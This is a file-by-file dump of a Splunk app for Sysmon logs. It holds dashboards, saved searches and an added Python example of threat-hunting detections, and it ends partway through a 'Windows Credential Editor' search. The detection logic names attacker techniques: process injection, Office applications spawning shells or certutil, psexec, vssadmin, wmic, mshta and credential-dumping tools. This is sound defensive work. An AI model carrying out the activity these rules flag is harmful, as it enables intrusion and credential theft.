├── LICENSE
├── README.md
├── default
│   ├── app.conf
│   ├── data
│   │   └── ui
│   │       ├── nav
│   │       │   └── default.xml
│   │       └── views
│   │           ├── README
│   │           ├── file_creation_overview.xml
│   │           ├── investigator.xml
│   │           ├── network_connections.xml
│   │           ├── network_overview.xml
│   │           ├── overview.xml
│   │           ├── process_finder.xml
│   │           ├── process_overview.xml
│   │           ├── process_timeline.xml
│   │           ├── process_watch.xml
│   │           ├── registry_overview.xml
│   │           ├── suspicious_indicators.xml
│   │           └── sysmon_overview.xml
│   ├── macros.conf
│   └── savedsearches.conf
├── metadata
│   └── default.meta
└── static
    ├── appIcon.png
    ├── appIconAlt.png
    ├── appIconAlt_2x.png
    └── appIcon_2x.png

/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2017 Michael Haag

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Sysmon Splunk app

This is a combined Splunk App effort between @jarrettp and @m_haggis.

### Joint Contributor Credits

* Gibin John (beahunt3r)
* Vineet Bhatia (threathunting)

#### What is in the App:

##### Dashboards:
- Sysmon Overview - Shows a basic overview and usage for Sysmon events.
- Investigator - Allows searching of events for specific hosts and users.
- Network Overview
- File Creation Overview
- Process Overview
- Suspicious Indicators - Collection of some known IOCs
- Registry Overview
- Network Connections
- Process Finder - Helps find rare hash values based on the percentage of hosts they appear on
- Process Timeline - Uses LogonGuid to map a timeline of processes. Allows clicking for drilldown.

##### Reports:
- Over 40 reports

##### Alerts:
- 19 pre-built alerts

# Setup

Deploy [Sysmon-TA](https://splunkbase.splunk.com/app/1914/)

Download and deploy this app to your Splunk Search Head.

A macro is used for all saved searches; you will need to modify it for your environment to ensure the proper Sysmon sourcetype/index is searched.

Macros: Settings --> Advanced Search --> Search Macros. Edit to your environment.

Default - sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"

That's it.

# Install Sysmon

### Install ###

Run with administrator rights
~~~~
sysmon.exe -accepteula -i sysmonconfig-export.xml
~~~~

### Update existing configuration ###

Run with administrator rights
~~~~
sysmon.exe -c sysmonconfig-export.xml
~~~~

Upon installation, Sysmon will begin logging events to the operational event log "C:\Windows\System32\winevt\Logs\Microsoft-Windows-Sysmon%4Operational.evtx".

## Sysmon configuration ##

Sysmon resources and example configuration files may be found [here](https://github.com/MHaggis/sysmon-dfir)
--------------------------------------------------------------------------------
/default/app.conf:
--------------------------------------------------------------------------------
#
# Splunk app configuration file
#

[install]
is_configured = 0

[ui]
is_visible = 1
label = Sysmon App for Splunk

[launcher]
author = MHaggis,kidcrash22
description =
version = 1.0

[package]
id = sysmon-splunk-app
--------------------------------------------------------------------------------
/default/data/ui/nav/default.xml:
--------------------------------------------------------------------------------
(25-line navigation XML not preserved in the extraction.)
--------------------------------------------------------------------------------
/default/data/ui/views/README:
--------------------------------------------------------------------------------
Add all the views that your app needs in this directory
--------------------------------------------------------------------------------
/default/data/ui/views/file_creation_overview.xml:
--------------------------------------------------------------------------------
(Simple XML tags lost in extraction; the recoverable panel titles and searches follow.)

Time input "time": earliest -24h@h, latest now

Panel: Files Created Over Time
  `sysmon` EventCode=11 | timechart count
  earliest $time.earliest$, latest $time.latest$

Panel: Top Files Created
  `sysmon` EventCode=11 | top TargetFilename
  earliest $time.earliest$, latest $time.latest$

Panel: Top Systems
  `sysmon` EventCode=11 | top Computer
  earliest $time.earliest$, latest $time.latest$

Panel: Top File Creation Processes
  `sysmon` EventCode=11 | top Image
  earliest $time.earliest$, latest $time.latest$
--------------------------------------------------------------------------------
/default/data/ui/views/investigator.xml:
--------------------------------------------------------------------------------
(Simple XML tags lost in extraction; the recoverable inputs, panel titles and searches follow.)

Time input "timesel": earliest -24h@h, latest now
Text inputs "comp" and "usr": default *

Panel (untitled)
  `sysmon` Computer=$comp$ user=$usr$ | stats count by EventDescription
  earliest $timesel.earliest$, latest $timesel.latest$

Panel: Network Destinations
  `sysmon` EventDescription="Network Connect" Computer=$comp$ user=$usr$ | top dest_host | rename dest_host AS "Destination"
  earliest $timesel.earliest$, latest $timesel.latest$

Panel: Network Ports
  `sysmon` EventDescription="Network Connect" Computer=$comp$ user=$usr$ | top dest_port | rename dest_port AS "Destination Port"
  earliest $timesel.earliest$, latest $timesel.latest$

Panel: Critical Processes
  `sysmon` (process="*\\powershell.exe" OR process="*\\msbuild.exe" OR process="*\\psexec.exe" OR process="*\\at.exe" OR process="*\\schtasks.exe" OR process="*\\net.exe" OR process="*\\vssadmin.exe" OR process="*\\utilman.exe" OR process="*\\wmic.exe" OR process="*\\mshta.exe" OR process="*\\wscript.exe" OR process="*\\cscript.exe" OR process="*\\cmd.exe" OR process="*\\whoami.exe" OR process="*\\mmc.exe" OR process="*\\systeminfo.exe" OR process="*\\csvde.exe") Computer=$comp$ user=$usr$ | stats count by process
  earliest $timesel.earliest$, latest $timesel.latest$

Panel: Parent/Child Processes
  `sysmon` EventCode="1" Computer=$comp$ user=$usr$ | stats values(ParentImage) by process
  earliest $timesel.earliest$, latest $timesel.latest$

Panel: Network Applications
  `sysmon` EventDescription="Network Connect" Computer=$comp$ user=$usr$ | stats values(dest_host) by Image
  earliest $timesel.earliest$, latest $timesel.latest$

Panel: Hashes by Image
  `sysmon` EventCode="1" Computer=$comp$ user=$usr$ | stats dc(MD5) as numhashes, values(MD5) AS "MD5 Hash" by Image
  earliest $timesel.earliest$, latest $timesel.latest$
--------------------------------------------------------------------------------
/default/data/ui/views/network_connections.xml:
--------------------------------------------------------------------------------
(Simple XML tags lost in extraction; the recoverable inputs and search follow.)

Time input "timsel": earliest -24h@h, latest now
Text inputs "imgsel", "protosel", "portsel", "destinations": default *

Panel (untitled)
  `sysmon` EventCode=3 Image="$imgsel$" protocol="$protosel$" dest_port="$portsel$" "$destinations$" | eval Destination=coalesce(dest_host,dest_ip) | stats count, values(Destination) AS "Destinations", values(dest_port) AS "Ports", values(protocol) AS "Protocols" by Image | fields Image Destinations Ports Protocols count
  earliest $timsel.earliest$, latest $timsel.latest$
--------------------------------------------------------------------------------
/default/data/ui/views/network_overview.xml:
--------------------------------------------------------------------------------
(Simple XML tags lost in extraction; the recoverable panel titles and searches follow.)

Time input "time": earliest -24h@h, latest now

Panel: Network Connections Over Time
  `sysmon` EventDescription="Network Connect" | timechart count
  earliest $time.earliest$, latest $time.latest$

Panel: Top Source Hosts
  `sysmon` EventDescription="Network Connect" | top src_host | rename src_host AS "Source"
  earliest $time.earliest$, latest $time.latest$

Panel: Top Destinations
  `sysmon` EventDescription="Network Connect" | top dest_host | rename dest_host AS "Destination"
  earliest $time.earliest$, latest $time.latest$

Panel: Top Destination Ports
  `sysmon` EventDescription="Network Connect" | top dest_port | rename dest_port AS "Destination Port"
  earliest $time.earliest$, latest $time.latest$

Panel: Destination Locations
  `sysmon` EventDescription="Network Connect" | iplocation dest_ip | geostats count by dest_ip
  earliest $time.earliest$, latest $time.latest$

Panel: Top Applications
  `sysmon` EventDescription="Network Connect" | top Image
  earliest $time.earliest$, latest $time.latest$

Panel: Rare Applications
  `sysmon` EventDescription="Network Connect" | rare Image
  earliest $time.earliest$, latest $time.latest$
--------------------------------------------------------------------------------
/default/data/ui/views/overview.xml:
--------------------------------------------------------------------------------
(Simple XML tags lost in extraction; the recoverable description, panel titles and searches follow.)

Description: High level overview of your Sysmon environment.

Panel: Computer Count
  `sysmon` | stats dc(Computer)
  earliest -24h@h, latest now

Panel: Sysmon-Top EventDescription
  (search body not preserved)

Panel: Critical Process
  (search body not preserved)
--------------------------------------------------------------------------------
/default/data/ui/views/process_finder.xml:
--------------------------------------------------------------------------------
(Simple XML tags lost in extraction; the recoverable description, inputs and search follow.)

Description: Assists in finding rare hash/process values based on percentage

Time input "timesel": earliest -24h@h, latest now
Text input "procsel": default *
Text input "ltpercent": default 100

Panel (untitled)
  `sysmon` process="$procsel$" | dedup Computer, MD5
  | eval TIME=strftime(_time,"%m/%d/%Y %I:%M:%S %p")
  | eventstats dc(Computer) as total_host
  | stats earliest(TIME) count values(total_host) AS total_host by MD5, process
  | eval majority_percent=round((count/total_host)*100,2)
  | where majority_percent < $ltpercent$
  | table MD5 process earliest(TIME) count majority_percent total_host
  earliest $timesel.earliest$, latest $timesel.latest$
--------------------------------------------------------------------------------
/default/data/ui/views/process_overview.xml:
--------------------------------------------------------------------------------
(Simple XML tags lost in extraction; the recoverable panel titles and searches follow.)

Time input "time": earliest -24h@h, latest now

Panel: Processes Over Time
  `sysmon` EventDescription="Process Create" | timechart count
  earliest $time.earliest$, latest $time.latest$

Panel: Top Command Line
  `sysmon` EventDescription="Process Create" | top CommandLine
  earliest $time.earliest$, latest $time.latest$

Panel: Top Process Creators
  `sysmon` EventDescription="Process Create" | top User
  earliest $time.earliest$, latest $time.latest$

Panel: Top Images
  `sysmon` EventDescription="Process Create" | top Image
  earliest $time.earliest$, latest $time.latest$

Panel: Hashes by Image
  `sysmon` EventCode="1" | rex field=Hashes ".*MD5=(?<MD5>[A-F0-9]*),IMPHASH=(?<IMPHASH>[A-F0-9]*)" | stats dc(MD5) as numhashes, values(MD5) AS "MD5 Hash" by Image
  earliest $time.earliest$, latest $time.latest$
--------------------------------------------------------------------------------
/default/data/ui/views/process_timeline.xml:
--------------------------------------------------------------------------------
(Simple XML tags lost in extraction; the recoverable description, panel titles, searches and drilldown tokens follow.)

Description: Analyze events within a given process over time. Click LogonGuid and Processes to drill down.

Time input "timepicker": earliest -24h@h, latest now

Panel: LogonGuid Selector
  `sysmon` LogonGuid=* $usrsel$ | dedup LogonGuid | eval Time=strftime(_time,"%m/%d/%Y %I:%M:%S %p") | table Time LogonGuid user Computer
  earliest $timepicker.earliest$, latest $timepicker.latest$
  drilldown: token set from $click.value2$

Panel (header text: $guidsel$)
  `sysmon` LogonGuid="$logsel$" | timechart span=30m count by process limit=20
  earliest $timepicker.earliest$, latest $timepicker.latest$
  drilldown: token set from $click.name2$

Panel: Process: $procsel$
  `sysmon` LogonGuid="$logsel$" $procsel$
  | eval Time=strftime(_time,"%m/%d/%Y %I:%M:%S %p")
  | table Time EventDescription Image CommandLine ParentImage ParentCommandLine user
  earliest $timepicker.earliest$, latest $timepicker.latest$
--------------------------------------------------------------------------------
/default/data/ui/views/process_watch.xml:
--------------------------------------------------------------------------------
(Simple XML tags lost in extraction; the recoverable panel titles and searches follow.)

Time input "time": earliest -24h@h, latest now

Panel: Powershell Commands
  `sysmon` EventDescription="Process Create" (Image="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" OR Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") | stats count by CommandLine | sort -count
  earliest $time.earliest$, latest $time.latest$

Panel: CMD Commands
  `sysmon` EventDescription="Process Create" Image="C:\\Windows\\System32\\cmd.exe" | stats count by CommandLine | sort -count
  earliest $time.earliest$, latest $time.latest$
--------------------------------------------------------------------------------
/default/data/ui/views/registry_overview.xml:
--------------------------------------------------------------------------------
(Simple XML tags lost in extraction; the recoverable panel titles and searches follow.)

Time input "time": earliest -24h@h, latest now

Panel: Registry Events Over Time
  `sysmon` EventCode=13 | eval Time=strftime(_time,"%m/%d/%Y %I:%M:%S %p") | timechart count
  earliest $time.earliest$, latest $time.latest$

Panel: Top Processes
  `sysmon` EventCode=13 | eval Time=strftime(_time,"%m/%d/%Y %I:%M:%S %p") | top Image
  earliest $time.earliest$, latest $time.latest$

Panel: Top Registry Objects
  `sysmon` EventCode=13 | eval Time=strftime(_time,"%m/%d/%Y %I:%M:%S %p") | top TargetObject
  earliest $time.earliest$, latest $time.latest$
--------------------------------------------------------------------------------
/default/data/ui/views/suspicious_indicators.xml:
--------------------------------------------------------------------------------
(Simple XML tags lost in extraction; the recoverable panel titles and searches follow.)

Time input "time": earliest -24h@h, latest now

Panel: User Level Injections
  `sysmon` EventCode=8 (SourceImage=*temp* OR SourceImage="C:\\ProgramData\\*" OR SourceImage="C:\\Users\\*") | eval ppid=SourceImage+";"+TargetImage
  earliest $time.earliest$, latest $time.latest$

Panel: Small Filename Length Execution
  `sysmon` EventCode=1 | rex field=Image "(?<filename>[^\\\]+)$" | eval file_length=len(filename) | where file_length < 6 | table Image, filename, Computer
  earliest $time.earliest$, latest $time.latest$

Panel: svchost Injections
  `sysmon` EventCode=8 TargetImage="C:\\Windows\\System32\\svchost.exe" | eval ppid=SourceImage+";"+TargetImage | rare ppid
  earliest $time.earliest$, latest $time.latest$

Panel: Commands Running from Office Products
  `sysmon` EventCode=1 (Image="*\\cmd.exe" OR Image="*\\powershell.exe" OR Image="*\\wscript.exe" OR Image="*\\certutil.exe") AND (ParentImage="*\\WINWORD.exe" OR ParentImage="*\\EXCEL.exe" OR ParentImage="*\\PowerPNT.exe")
  earliest $time.earliest$, latest $time.latest$
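The four Suspicious Indicators panels are each a filter over one Sysmon event type: CreateRemoteThread (EventCode 8) from a user-writable source path, Process Create (EventCode 1) with a very short file name, the rarest source/target pairs injecting into svchost.exe, and a shell or script host whose parent is an Office application. The Python below is an added example, not the app's code, that implements those four checks over constructed events (hostnames and paths are made up) with the EventCode condition applied to every alternative, so the logic can be unit-tested before it is ported into a dashboard or an alert:

```python
import fnmatch
from collections import Counter
from pathlib import PureWindowsPath


def spl_like(value, pattern):
    """Case-insensitive wildcard comparison, in the spirit of an SPL field="*pattern*" term."""
    return fnmatch.fnmatchcase(value.lower(), pattern.lower())


def user_level_injection(ev):
    """EventCode 8 (CreateRemoteThread) whose source runs from a user-writable location."""
    user_paths = ("*temp*", r"C:\ProgramData\*", r"C:\Users\*")
    return ev["EventCode"] == 8 and any(spl_like(ev["SourceImage"], p) for p in user_paths)


def small_filename(ev):
    """EventCode 1 where the executable's file name is shorter than six characters."""
    return ev["EventCode"] == 1 and len(PureWindowsPath(ev["Image"]).name) < 6


def office_spawned_shell(ev):
    """EventCode 1 where an Office application is the parent of a shell or script host."""
    children = (r"*\cmd.exe", r"*\powershell.exe", r"*\wscript.exe", r"*\certutil.exe")
    parents = (r"*\WINWORD.exe", r"*\EXCEL.exe", r"*\PowerPNT.exe")
    return (ev["EventCode"] == 1
            and any(spl_like(ev["Image"], c) for c in children)
            and any(spl_like(ev["ParentImage"], p) for p in parents))


RULES = {
    "user_level_injection": user_level_injection,
    "small_filename": small_filename,
    "office_spawned_shell": office_spawned_shell,
}


def run_indicators(events):
    """Return (rule name, event index) for every event that trips a per-event rule."""
    return [(name, i) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]


def svchost_injection_pairs(events):
    """Equivalent of `eval ppid=SourceImage+";"+TargetImage | rare ppid` over EventCode 8
    events targeting svchost.exe: least common pairs first."""
    pairs = Counter(f'{ev["SourceImage"]};{ev["TargetImage"]}'
                    for ev in events
                    if ev["EventCode"] == 8
                    and spl_like(ev["TargetImage"], r"C:\Windows\System32\svchost.exe"))
    return sorted(pairs.items(), key=lambda kv: (kv[1], kv[0]))


def _ev(code, **fields):
    base = {"EventCode": code, "Image": "", "ParentImage": "", "SourceImage": "", "TargetImage": ""}
    base.update(fields)
    return base


SVCHOST = r"C:\Windows\System32\svchost.exe"
# Constructed events; paths and file names are made up for the demonstration.
EVENTS = [
    _ev(8, SourceImage=r"C:\Users\bob\AppData\Local\Temp\loader.exe", TargetImage=SVCHOST),
    _ev(8, SourceImage=r"C:\Windows\System32\csrss.exe", TargetImage=SVCHOST),
    _ev(8, SourceImage=r"C:\Windows\System32\csrss.exe", TargetImage=SVCHOST),
    _ev(1, Image=r"C:\Users\bob\a.exe", ParentImage=r"C:\Windows\explorer.exe"),
    _ev(1, Image=r"C:\Windows\System32\cmd.exe",
        ParentImage=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    _ev(1, Image=r"C:\Windows\System32\notepad.exe", ParentImage=r"C:\Windows\explorer.exe"),
    _ev(3, Image=r"C:\Users\bob\a.exe"),  # network event, not a process creation: no hit
]

if __name__ == "__main__":
    print(run_indicators(EVENTS))
    print(svchost_injection_pairs(EVENTS))
```

The last constructed event shows why the EventCode term must bind to every alternative: an `Image` value alone is not enough, since Sysmon also populates `Image` on network, file and registry events.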
--------------------------------------------------------------------------------
/default/data/ui/views/sysmon_overview.xml:
--------------------------------------------------------------------------------
(Simple XML tags lost in extraction; the recoverable panel titles and searches follow.)

Time input "time": earliest -24h@h, latest now

Panel: Event Count
  `sysmon` | stats count
  earliest $time.earliest$, latest $time.latest$

Panel: Event Count Over Time
  `sysmon` | timechart count
  earliest $time.earliest$, latest $time.latest$

Panel: Event Type Breakdown
  `sysmon` | stats count by EventDescription
  earliest $time.earliest$, latest $time.latest$

Panel: Events by Host
  `sysmon` | stats count by Computer | sort - count
  earliest $time.earliest$, latest $time.latest$

Panel: Events Count by User
  `sysmon` | stats count by User | sort - count
  earliest $time.earliest$, latest $time.latest$
--------------------------------------------------------------------------------
/default/macros.conf:
--------------------------------------------------------------------------------

[sysmon]
definition = sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
iseval = 0
--------------------------------------------------------------------------------
/default/savedsearches.conf:
--------------------------------------------------------------------------------

[Powershell - EventDescription]
action.email.useNSSubject = 1
alert.track = 0
dispatch.earliest_time = -24h@h
dispatch.latest_time = now
display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"]
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` process=powershell.exe | stats values(EventDescription) by process

[Sysmon - Top EventDescription]
action.email.useNSSubject = 1
alert.track = 0
dispatch.earliest_time = -24h@h
dispatch.latest_time = now
display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"]
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` | top EventDescription

[Sysmon - Parent to Child]
action.email.useNSSubject = 1
alert.track = 0
dispatch.earliest_time = -24h@h
dispatch.latest_time = now
dispatchAs = user
display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"]
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` NOT splunk | stats values(ParentImage) by process

[EventDescription - by process, Commandline]
action.email.useNSSubject = 1
alert.track = 0
display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"]
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` NOT splunk | stats values(EventDescription) by process,CommandLine

[Powershell - All PoSh by Computer]
action.email.useNSSubject = 1
alert.track = 0
dispatchAs = user
display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"]
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` process=powershell.exe | stats values(CommandLine) by Computer,process

[net - All net usage]
action.email.useNSSubject = 1
alert.track = 0
dispatch.earliest_time = -60m@m
dispatch.latest_time = now
dispatchAs = user
display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"]
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` process=net.exe | stats count by Computer,CommandLine

[wmic.exe - all wmic execution]
action.email.useNSSubject = 1
alert.track = 0
dispatch.earliest_time = -60m@m
dispatch.latest_time = now
dispatchAs = user
display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"]
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` process=wmic.exe | stats count by Computer,CommandLine

[CommandLine - By computer, process]
action.email.useNSSubject = 1
alert.track = 0
dispatchAs = user
display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"]
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` | stats values(CommandLine) by Computer,process

[Net - Group, localgroup]
action.email.useNSSubject = 1
alert.track = 0
dispatchAs = user
display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"]
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` process="net.exe" (CommandLine="*net group*" OR CommandLine="*net localgroup*") | stats count by Computer,CommandLine

[Users by Computer]
action.email.useNSSubject = 1
alert.track = 0
dispatchAs = user
display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"]
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` | stats values(user) by Computer

[Commandline by user]
action.email.useNSSubject = 1
alert.track = 0
dispatchAs = user
display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"]
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` | stats values(CommandLine) by user

[Net - net view]
action.email.useNSSubject = 1
alert.track = 0
dispatchAs = user
display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"]
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` process=net.exe (CommandLine="net view") | stats count by Computer,CommandLine

[Windows Credential Editor]
action.email.useNSSubject = 1
alert.track = 0
dispatch.earliest_time = -24h@h
dispatch.latest_time = now
dispatchAs = user
